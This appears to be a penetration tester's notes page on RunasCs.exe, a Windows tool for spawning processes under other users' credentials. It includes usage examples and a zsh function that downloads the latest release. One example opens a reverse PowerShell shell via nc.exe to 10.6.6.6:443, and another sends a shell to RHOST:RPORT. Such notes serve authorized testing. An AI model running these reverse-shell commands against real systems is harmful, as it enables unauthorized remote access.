Spawn Processes as Other Users

RunasCs.exe

Project GitHub

https://github.com/antonioCoco/RunasCs/releases

Example Usage

Spawn Process with Network Credentials

# -l 8 : logontype 8 (NetworkCleartext)
# Launch reverse PowerShell session over Netcat socket
.\RunasCs.exe -d domain.tld -l 8 'username' 'password' 'C:\Windows\Temp\nc.exe 10.6.6.6 443 -e powershell.exe'

Spawn Process with Logon

.\RunasCs.exe username_here password_here powershell.exe -r RHOST:RPORT

Easy Download

I put a function in my .zshrc file and run download_runascs to easily grab the latest version of the binary from GitHub releases.

function download_runascs() {

    # Use the "latest" slug to always grab the newest stable release
    latest_release_url='https://github.com/antonioCoco/RunasCs/releases/latest'
    # Get the base URL of the latest stable tagged version
    # Remove any trailing spaces
    latest_stable_url=$(curl -sI "$latest_release_url" | grep location | awk -v FS=' ' '{print $2}' | sed -E 's/\s{1,}$//g')

    # Use the tagged release URL and swap out `tag` for `download` in the URL
    download_base_url=$(echo -n "$latest_stable_url" | sed 's/tag/download/g')    
    binary_version=$(echo "$latest_stable_url" | rev | cut -d '/' -f 1 | rev | tr -d 'v')


    output_name='RunasCs.zip'
    download_url="${download_base_url}/${output_name}"

    # Download, extract, set mode
    curl -sL $download_url -o "$PWD/${output_name}"
    unzip -qq "${output_name}"
    echo "RunasCs binaries downloaded and unarchived in $PWD"

}